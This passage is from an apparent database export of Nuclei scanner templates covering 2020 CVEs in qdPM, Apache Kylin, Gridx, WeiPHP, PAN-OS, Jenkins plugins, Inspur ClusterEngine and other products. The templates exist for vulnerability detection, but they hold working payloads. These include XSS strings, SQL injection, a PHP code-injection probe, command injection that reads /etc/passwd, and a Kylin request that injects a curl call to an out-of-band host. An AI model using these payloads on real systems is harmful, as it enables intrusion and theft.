200\n# digest: 4a0a00473045022006e28c04c6e659e78912043952b0271d2aeef3c1bf3f0bac0fdea8cb76ee8171022100fee8c07cb484ee92a3c0a9102ef9de1b8d6429e5398848261f05f3a3b9507fa9:922c64590222798bb761d5b6d8e72950", "hash": "892953ff1d5baf8d0758aba0845cdc75", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081b6" }, "name": "CVE-2020-19515.yaml", "content": "id: CVE-2020-19515\n\ninfo:\n name: qdPM 9.1 - Cross-site Scripting\n author: theamanrawat\n severity: medium\n description: |\n qdPM V9.1 is vulnerable to Cross Site Scripting (XSS) via qdPM\\install\\modules\\database_config.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.\n remediation: |\n To mitigate this vulnerability, it is recommended to apply the latest security patches or updates provided by the vendor.\n reference:\n - https://topsecalphalab.github.io/CVE/qdPM9.1-Installer-Cross-Site-Scripting\n - http://qdpm.net/download-qdpm-free-project-management\n - https://nvd.nist.gov/vuln/detail/CVE-2020-19515\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2020-19515\n cwe-id: CWE-79\n epss-score: 0.00102\n epss-percentile: 0.41242\n cpe: cpe:2.3:a:qdpm:qdpm:9.1:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: qdpm\n product: qdpm\n shodan-query: http.favicon.hash:762074255\n tags: cve2020,cve,xss,qdpm,unauth\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/install/index.php?step=database_config&db_error=\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ''\n - 'qdPM'\n condition: and\n\n - type: word\n part: header\n words:\n - 'text/html'\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402205447757079347b8070e89fe60975aa83c5f776a495770b9fe12acf27f046e0030220569d1f8e17b6d601ebb193264cb7fab1e1dea5fdb12a553bd34fd8f502786c21:922c64590222798bb761d5b6d8e72950", "hash": "48313832b3f07b93531738104785700a", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081b7" }, "name": "CVE-2020-1956.yaml", "content": "id: CVE-2020-1956\n\ninfo:\n name: Apache Kylin 3.0.1 - Command Injection Vulnerability\n author: iamnoooob,rootxharsh,pdresearch\n severity: high\n description: |\n Apache Kylin 2.3.0, and releases up to 2.6.5 and 3.0.1 has some restful apis which will concatenate os command with the user input string, a user is likely to be able to execute any os command without any protection or validation.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized remote code execution and potential compromise of the affected server.\n remediation: |\n Upgrade to a patched version of Apache Kylin or apply the necessary security patches provided by the vendor.\n reference:\n - https://www.sonarsource.com/blog/apache-kylin-command-injection-vulnerability/\n - https://community.sonarsource.com/t/apache-kylin-3-0-1-command-injection-vulnerability/25706\n - https://nvd.nist.gov/vuln/detail/CVE-2020-1956\n - http://www.openwall.com/lists/oss-security/2020/07/14/1\n - https://lists.apache.org/thread.html/r021baf9d8d4ae41e8c8332c167c4fa96c91b5086563d9be55d2d7acf@%3Ccommits.kylin.apache.org%3E\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2020-1956\n cwe-id: CWE-78\n epss-score: 0.97374\n epss-percentile: 0.99898\n cpe: cpe:2.3:a:apache:kylin:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: apache\n product: kylin\n shodan-query: http.favicon.hash:-186961397\n tags: cve,cve2020,apache,kylin,rce,oast,kev\nvariables:\n username: \"{{username}}:\"\n password: \"{{password}}\"\n\nhttp:\n - raw:\n - |\n POST /kylin/api/user/authentication HTTP/1.1\n Host: {{Hostname}}\n Authorization: Basic {{base64('{{username}}:' + '{{password}}')}}\n - |\n POST /kylin/api/cubes/kylin_streaming_cube/%2031%60curl%20{{interactsh-url}}%60/migrate HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol\n words:\n - http\n\n - type: word\n part: interactsh_request\n words:\n - \"User-Agent: curl\"\n# digest: 4b0a00483046022100c8831b7a79e58b4e7a67c451f73d3cfb37a6ef3e8e5c080eadc921d72b3f7337022100c542e5c9d7531e4b3e781bbd0655fda3a0f3e96ccce83923abd4935aa15564ac:922c64590222798bb761d5b6d8e72950", "hash": "cc3f5279f4427783b2cf09b26c2930fd", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081b8" }, "name": "CVE-2020-19625.yaml", "content": "id: CVE-2020-19625\n\ninfo:\n name: Gridx 1.3 - Remote Code Execution\n author: geeknik\n severity: critical\n description: |\n Gridx 1.3 is susceptible to remote code execution via tests/support/stores/test_grid_filter.php, which allows remote attackers to execute arbitrary code via crafted values submitted to the $query parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: |\n Apply the latest security patch or upgrade to a non-vulnerable version of Gridx.\n reference:\n - http://mayoterry.com/file/cve/Remote_Code_Execution_Vulnerability_in_gridx_latest_version.pdf\n - https://github.com/oria/gridx/issues/433\n - https://nvd.nist.gov/vuln/detail/CVE-2020-19625\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/Elsfa7-110/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-19625\n epss-score: 0.83118\n epss-percentile: 0.98347\n cpe: cpe:2.3:a:gridx_project:gridx:1.3:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: gridx_project\n product: gridx\n tags: cve2020,cve,gridx,rce,gridx_project\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/tests/support/stores/test_grid_filter.php?query=echo%20md5%28%22CVE-2020-19625%22%29%3B\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"6ca86c2c17047c14437f55c42c801c10\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022010116eac10c662352816fdc7275b981a6e39c56d6352ec21d836a4e74a1df0c3022100ba1c1d466fc94f5ae38431892ad204de958a82fa1a79987a48ee5965ccd58aac:922c64590222798bb761d5b6d8e72950", "hash": "300ededbe7eda076b27c847311a4521f", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081b9" }, "name": "CVE-2020-20285.yaml", "content": "id: CVE-2020-20285\n\ninfo:\n name: ZZcms - Cross-Site Scripting\n author: edoardottt\n severity: medium\n description: |\n ZZcms 2019 contains a cross-site scripting vulnerability in the user login page. An attacker can inject arbitrary JavaScript code in the referer header via user/login.php, which can allow theft of cookie-based credentials and launch of subsequent attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://github.com/iohex/ZZCMS/blob/master/zzcms2019_login_xss.md\n - https://nvd.nist.gov/vuln/detail/CVE-2020-20285\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 5.4\n cve-id: CVE-2020-20285\n cwe-id: CWE-79\n epss-score: 0.0009\n epss-percentile: 0.37789\n cpe: cpe:2.3:a:zzcms:zzcms:2019:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: zzcms\n product: zzcms\n fofa-query: zzcms\n tags: cve2020,cve,zzcms,xss\n\nhttp:\n - raw:\n - |\n GET /user/login.php HTTP/1.1\n Host: {{Hostname}}\n Referer: xss\"/>\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'fromurl\" type=\"hidden\" value=\"xss\"/>'\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502202c9b0b05dd0d5566e148b27219b5d138bebd927b962661d892abffc7ab6c129a022100c423a96886f0bd34eb700de5fdb5508c514ad9ab63c39a03069d86fa47b9139f:922c64590222798bb761d5b6d8e72950", "hash": "f245908fbd79fcbf39b053d9058115bc", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081ba" }, "name": "CVE-2020-20300.yaml", "content": "id: CVE-2020-20300\n\ninfo:\n name: WeiPHP 5.0 - SQL Injection\n author: pikpikcu\n severity: critical\n description: WeiPHP 5.0 contains a SQL injection vulnerability via the wp_where function. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n Upgrade to a patched version of WeiPHP or apply the vendor-supplied patch to fix the SQL Injection vulnerability.\n reference:\n - https://github.com/Y4er/Y4er.com/blob/15f49973707f9d526a059470a074cb6e38a0e1ba/content/post/weiphp-exp-sql.md\n - https://nvd.nist.gov/vuln/detail/CVE-2020-20300\n - https://github.com/Y4er/Y4er.com/blob/master/content/post/weiphp-exp-sql.md\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-20300\n cwe-id: CWE-89\n epss-score: 0.20647\n epss-percentile: 0.96263\n cpe: cpe:2.3:a:weiphp:weiphp:5.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: weiphp\n product: weiphp\n shodan-query: http.html:\"WeiPHP5.0\"\n tags: cve,cve2020,weiphp,sql,sqli\n\nhttp:\n - method: POST\n path:\n - \"{{BaseURL}}/public/index.php/home/index/bind_follow/?publicid=1&is_ajax=1&uid[0]=exp&uid[1]=)%20and%20updatexml(1,concat(0x7e,md5('999999'),0x7e),1)--+ \"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"52c69e3a57331081823331c4e69d3f2\"\n\n - type: status\n status:\n - 500\n# digest: 4b0a00483046022100d8797af312f8278f5b2970883e169d0005026e8cf66544ea1c56f941fa37a2ab022100f9e0d410a6eafe296be9a17b89b19819a22377b358619a3abc0d1ec6df6e69ac:922c64590222798bb761d5b6d8e72950", "hash": "99d797548a9e6d894262e73e326a758d", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081bb" }, "name": "CVE-2020-2036.yaml", "content": "id: CVE-2020-2036\n\ninfo:\n name: Palo Alto Networks PAN-OS Web Interface - Cross Site-Scripting\n author: madrobot,j4vaovo\n severity: high\n description: |\n PAN-OS management web interface is vulnerable to reflected cross-site scripting. A remote attacker able to convince an administrator with an active authenticated session on the firewall management interface to click on a crafted link to that management web interface could potentially execute arbitrary JavaScript code in the administrator's browser and perform administrative actions. This issue impacts: PAN-OS 8.1 versions earlier than PAN-OS 8.1.16; PAN-OS 9.0 versions earlier than PAN-OS 9.0.9.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Apply the latest security patches or updates provided by Palo Alto Networks to mitigate this vulnerability.\n reference:\n - https://swarm.ptsecurity.com/swarm-of-palo-alto-pan-os-vulnerabilities/\n - https://security.paloaltonetworks.com/CVE-2020-2036\n - https://nvd.nist.gov/vuln/detail/CVE-2020-2036\n - https://github.com/404notf0und/CVE-Flow\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2020-2036\n cwe-id: CWE-79\n epss-score: 0.03232\n epss-percentile: 0.91005\n cpe: cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*\n metadata:\n max-request: 3\n vendor: paloaltonetworks\n product: pan-os\n tags: cve2020,cve,vpn,xss,paloaltonetworks\n\nhttp:\n - raw:\n - |\n GET /_404_/%22%3E%3Csvg%2Fonload%3Dalert(document.domain)%3E HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /unauth/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(document.domain)%3E HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(document.domain)%3E HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: dsl\n dsl:\n - \"!contains(tolower(body_1), '')\"\n condition: and\n\n - type: dsl\n dsl:\n - \"status_code_2 == 200 && contains(header_2, 'text/html') && contains(tolower(body_2), '')\"\n - \"status_code_3 == 200 && contains(header_3, 'text/html') && contains(tolower(body_3), '')\"\n condition: or\n# digest: 4b0a0048304602210089c6dea6d48684d424ba49681ecb0835c3fda1e87848d90511a39562e7ec6cda022100dd4f07c17897a40e424f03c994207533a61c994bcffab2a1306cb1ef3585a6cc:922c64590222798bb761d5b6d8e72950", "hash": "29a91e69a898a270575a2b89fba3ee08", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081bc" }, "name": "CVE-2020-2096.yaml", "content": "id: CVE-2020-2096\n\ninfo:\n name: Jenkins Gitlab Hook <=1.4.2 - Cross-Site Scripting\n author: madrobot\n severity: medium\n description: Jenkins Gitlab Hook 1.4.2 and earlier does not escape project names in the build_now endpoint, resulting in a reflected cross-site scripting vulnerability.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions.\n remediation: |\n Upgrade to the latest version of Jenkins Gitlab Hook plugin (>=1.4.3) to mitigate this vulnerability.\n reference:\n - https://jenkins.io/security/advisory/2020-01-15/#SECURITY-1683\n - http://www.openwall.com/lists/oss-security/2020/01/15/1\n - http://packetstormsecurity.com/files/155967/Jenkins-Gitlab-Hook-1.4.2-Cross-Site-Scripting.html\n - https://nvd.nist.gov/vuln/detail/CVE-2020-2096\n - https://github.com/Elsfa7-110/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2020-2096\n cwe-id: CWE-79\n epss-score: 0.96965\n epss-percentile: 0.99712\n cpe: cpe:2.3:a:jenkins:gitlab_hook:*:*:*:*:*:jenkins:*:*\n metadata:\n max-request: 1\n vendor: jenkins\n product: gitlab_hook\n framework: jenkins\n shodan-query: http.title:\"GitLab\"\n tags: cve2020,cve,jenkins,xss,gitlab,plugin,packetstorm\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/gitlab/build_now%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502201687a011b3c1d0b082df0fc4bf771617cb0349de4cba006052c27eaba7755f79022100c31de3ab11f6116e0df6b8b2ca349dd4cd9dfbeb7bf1ab32871215d871c1cdbb:922c64590222798bb761d5b6d8e72950", "hash": "68d4012290da5df49eed73f8c2e9682b", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081bd" }, "name": "CVE-2020-20982.yaml", "content": "id: CVE-2020-20982\n\ninfo:\n name: shadoweb wdja v1.5.1 - Cross-Site Scripting\n author: pikpikcu,ritikchaddha\n severity: critical\n description: shadoweb wdja v1.5.1 is susceptible to cross-site scripting because it allows attackers to execute arbitrary code and gain escalated privileges via the backurl parameter to /php/passport/index.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: |\n Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://github.com/shadoweb/wdja/issues/1\n - https://nvd.nist.gov/vuln/detail/CVE-2020-20982\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\n cvss-score: 9.6\n cve-id: CVE-2020-20982\n cwe-id: CWE-79\n epss-score: 0.01894\n epss-percentile: 0.8721\n cpe: cpe:2.3:a:wdja:wdja_cms:1.5.1:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: wdja\n product: wdja_cms\n tags: cve2020,cve,xss,wdja,shadoweb\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/passport/index.php?action=manage&mtype=userset&backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"location.href='\"\n condition: and\n\n - type: word\n part: header\n words:\n - 'text/html'\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450220110601b1a49a68747b9aa3b13bbe9aa31125a8ecb69aea5635e8059b9bccb9cd022100f2d774931b5d7cf5e4fe62bce02077170a346d8e7b43b5fb0bc05e13ef852e8e:922c64590222798bb761d5b6d8e72950", "hash": "69d1c25384ab493ae57680eb4d0f6319", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081be" }, "name": "CVE-2020-20988.yaml", "content": "id: CVE-2020-20988\n\ninfo:\n name: DomainMOD 4.13.0 - Cross-Site Scripting\n author: arafatansari\n severity: medium\n description: |\n DomainMOD 4.13.0 is vulnerable to cross-site scripting via reporting/domains/cost-by-owner.php in the \"or Expiring Between\" parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability.\n reference:\n - https://mycvee.blogspot.com/p/xss2.html\n - https://nvd.nist.gov/vuln/detail/CVE-2020-20988\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 5.4\n cve-id: CVE-2020-20988\n cwe-id: CWE-79\n epss-score: 0.0009\n epss-percentile: 0.37789\n cpe: cpe:2.3:a:domainmod:domainmod:4.13.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: domainmod\n product: domainmod\n tags: cve2020,cve,domainmod,xss,authenticated\n\nhttp:\n - raw:\n - |\n POST / HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n new_username={{username}}&new_password={{password}}\n - |\n POST /reporting/domains/cost-by-owner.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n daterange=%22%2F%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\n\n host-redirects: true\n max-redirects: 2\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(header_2, \"text/html\")'\n - 'contains(body_2, \"value=\\\"\\\"/>\")'\n - 'contains(body_2, \"DomainMOD\")'\n condition: and\n# digest: 4a0a00473045022100fbb0177d572dab76f291eb8c5192458be9114f6ff475722fe228667a0a17f96602207f0bf6ee4c83004d0e951aaadb9b2b40b09318391f86ca1b5a3629de44e3adfb:922c64590222798bb761d5b6d8e72950", "hash": "35f8e0cd1a6ee891d543555b68de5e98", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081bf" }, "name": "CVE-2020-21012.yaml", "content": "id: CVE-2020-21012\n\ninfo:\n name: Sourcecodester Hotel and Lodge Management System 2.0 - SQL Injection\n author: edoardottt\n severity: critical\n description: |\n Sourcecodester Hotel and Lodge Management System 2.0 contains a SQL injection vulnerability via the email parameter to the edit page for Customer, Room, Currency, Room Booking Details, or Tax Details. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Sourcecodester Hotel and Lodge Management System 2.0.\n reference:\n - https://github.com/hitIer/web_test/tree/master/hotel\n - https://www.sourcecodester.com/php/13707/hotel-and-lodge-management-system.html\n - https://nvd.nist.gov/vuln/detail/CVE-2020-21012\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-21012\n cwe-id: CWE-89\n epss-score: 0.07235\n epss-percentile: 0.93887\n cpe: cpe:2.3:a:hotel_and_lodge_booking_management_system_project:hotel_and_lodge_booking_management_system:2.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: hotel_and_lodge_booking_management_system_project\n product: hotel_and_lodge_booking_management_system\n tags: cve,cve2020,hotel,sqli,unauth,hotel_and_lodge_booking_management_system_project\n\nhttp:\n - raw:\n - |\n POST /forgot_password.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n btn_forgot=1&email=1%27%20or%20sleep(6)%23\n\n matchers:\n - type: dsl\n dsl:\n - 'duration>=6'\n - 'status_code == 200'\n - 'contains(body, \"Hotel Booking System\")'\n condition: and\n# digest: 4a0a00473045022100ea99d63de90c17ef69343663ae409245371b719ba54e6602d603d1104a3cad99022075d17848133ba876d97f93a848b051ebb60d538253ef1ba0dc3a1c8f0df532fe:922c64590222798bb761d5b6d8e72950", "hash": "edcf4a6d4fabc12507972faeeae27ebd", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081c0" }, "name": "CVE-2020-2103.yaml", "content": "id: CVE-2020-2103\n\ninfo:\n name: Jenkins <=2.218 - Information Disclosure\n author: c-sh0\n severity: medium\n description: Jenkins through 2.218, LTS 2.204.1 and earlier, is susceptible to information disclosure. An attacker can access exposed session identifiers on a user detail object in the whoAmI diagnostic page and thus potentially access sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n An attacker can exploit this vulnerability to gain sensitive information from the Jenkins server.\n remediation: |\n Upgrade Jenkins to a version higher than 2.218 to mitigate the vulnerability.\n reference:\n - https://www.jenkins.io/security/advisory/2020-01-29/#SECURITY-1695\n - https://jenkins.io/security/advisory/2020-01-29/#SECURITY-1695\n - http://www.openwall.com/lists/oss-security/2020/01/29/1\n - https://nvd.nist.gov/vuln/detail/CVE-2020-2103\n - https://access.redhat.com/errata/RHBA-2020:0402\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 5.4\n cve-id: CVE-2020-2103\n cwe-id: CWE-200\n epss-score: 0.00534\n epss-percentile: 0.76681\n cpe: cpe:2.3:a:jenkins:jenkins:*:*:*:*:lts:*:*:*\n metadata:\n max-request: 2\n vendor: jenkins\n product: jenkins\n shodan-query: http.favicon.hash:81586312\n tags: cve,cve2020,jenkins\n\nhttp:\n - raw:\n - |\n GET {{BaseURL}}/whoAmI/ HTTP/1.1\n Host: {{Hostname}}\n - |\n GET {{BaseURL}}/whoAmI/ HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - 'text/html'\n - 'x-jenkins'\n case-insensitive: true\n condition: and\n\n - type: word\n part: body_2\n words:\n - 'Cookie'\n - 'SessionId: null'\n condition: and\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: kval\n kval:\n - x_jenkins\n# digest: 490a0046304402204719e69a3d9212bc5a83bc0637aa260c0f1a472289337a06a0795d661772b79a02203d747ba49dfc9831db6ee04e4a534db4d514e8afd98b86e178e116bf4de12837:922c64590222798bb761d5b6d8e72950", "hash": "98b1a5a5eaf74bee6e7c77fb61919aea", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081c1" }, "name": "CVE-2020-21224.yaml", "content": "id: CVE-2020-21224\n\ninfo:\n name: Inspur ClusterEngine 4.0 - Remote Code Execution\n author: pikpikcu\n severity: critical\n description: Inspur ClusterEngine V4.0 is suscptible to a remote code execution vulnerability. A remote attacker can send a malicious login packet to the control server.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: |\n Apply the latest security patches or updates provided by Inspur to mitigate this vulnerability.\n reference:\n - https://github.com/NS-Sp4ce/Inspur/tree/master/ClusterEngineV4.0%20Vul\n - https://nvd.nist.gov/vuln/detail/CVE-2020-21224\n - https://github.com/NS-Sp4ce/Inspur/\n - https://github.com/SexyBeast233/SecBooks\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-21224\n cwe-id: CWE-88\n epss-score: 0.04664\n epss-percentile: 0.92423\n cpe: cpe:2.3:a:inspur:clusterengine:4.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: inspur\n product: clusterengine\n tags: cve2020,cve,clusterengine,rce,inspur\n\nhttp:\n - method: POST\n path:\n - \"{{BaseURL}}/login\"\n\n body: |\n op=login&username=;`cat /etc/passwd`&password=\n\n headers:\n Content-Type: application/x-www-form-urlencoded\n Referer: \"{{Hostname}}/module/login/login.html\"\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022034c78c5214c182a891935aaea308b6e385207896bbf1e29aa5584b684156c624022100d8ce75817e295f76723a1f55b29e95769cea4ae6171cd1b4b162a8f2a7bd5cfa:922c64590222798bb761d5b6d8e72950", "hash": "199684985be3b736d03020177eee7c06", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081c2" }, "name": "CVE-2020-2140.yaml", "content": "id: CVE-2020-2140\n\ninfo:\n name: Jenkin Audit Trail <=3.2 - Cross-Site Scripting\n author: j3ssie/geraldino2\n severity: medium\n description: Jenkins Audit Trail 3.2 and earlier does not escape the error message for the URL Patterns field form validation, resulting in a reflected cross-site scripting vulnerability.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the application, leading to potential data theft, session hijacking, or defacement.\n remediation: |\n Upgrade to the latest version of Jenkin Audit Trail (>=3.3) which includes a fix for this vulnerability.\n reference:\n - https://www.jenkins.io/security/advisory/2020-03-09/\n - https://nvd.nist.gov/vuln/detail/CVE-2020-2140\n - https://jenkins.io/security/advisory/2020-03-09/#SECURITY-1722\n - http://www.openwall.com/lists/oss-security/2020/03/09/1\n - https://github.com/merlinepedra25/nuclei-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2020-2140\n cwe-id: CWE-79\n epss-score: 0.00181\n epss-percentile: 0.54462\n cpe: cpe:2.3:a:jenkins:audit_trail:*:*:*:*:*:jenkins:*:*\n metadata:\n max-request: 2\n vendor: jenkins\n product: audit_trail\n framework: jenkins\n tags: cve,cve2020,jenkins,xss,plugin\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Ch1%3Esample\"\n - \"{{BaseURL}}/jenkins/descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Ch1%3Esample\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n -

    sample\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022067a92ac8b7c22a4e10a1ee56656b6be594ea35020ea4799e5af8d2eef94cbbb102204d477f10be4ca3adbda2c9b72bb5526b256b068fcfe7e18923bea002242295d6:922c64590222798bb761d5b6d8e72950", "hash": "8c10f805d12fd8a2b10db498f4ca4c40", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081c3" }, "name": "CVE-2020-22208.yaml", "content": "id: CVE-2020-22208\n\ninfo:\n name: 74cms - ajax_street.php 'x' SQL Injection\n author: ritikchaddha\n severity: critical\n description: |\n SQL Injection in 74cms 3.2.0 via the x parameter to plus/ajax_street.php.\n impact: |\n Successful exploitation of this vulnerability could lead to unauthorized access, data leakage, and potential compromise of the underlying database.\n remediation: |\n Apply the vendor-provided patch or update to the latest version of 74cms to mitigate the SQL Injection vulnerability.\n reference:\n - https://github.com/blindkey/cve_like/issues/10\n - https://nvd.nist.gov/vuln/detail/CVE-2020-22208\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-22208\n cwe-id: CWE-89\n epss-score: 0.19578\n epss-percentile: 0.9585\n cpe: cpe:2.3:a:74cms:74cms:3.2.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: 74cms\n product: 74cms\n shodan-query: http.html:\"74cms\"\n fofa-query: app=\"74cms\"\n tags: cve2020,cve,74cms,sqli\nvariables:\n num: \"999999999\"\n\nhttp:\n - method: GET\n path:\n - 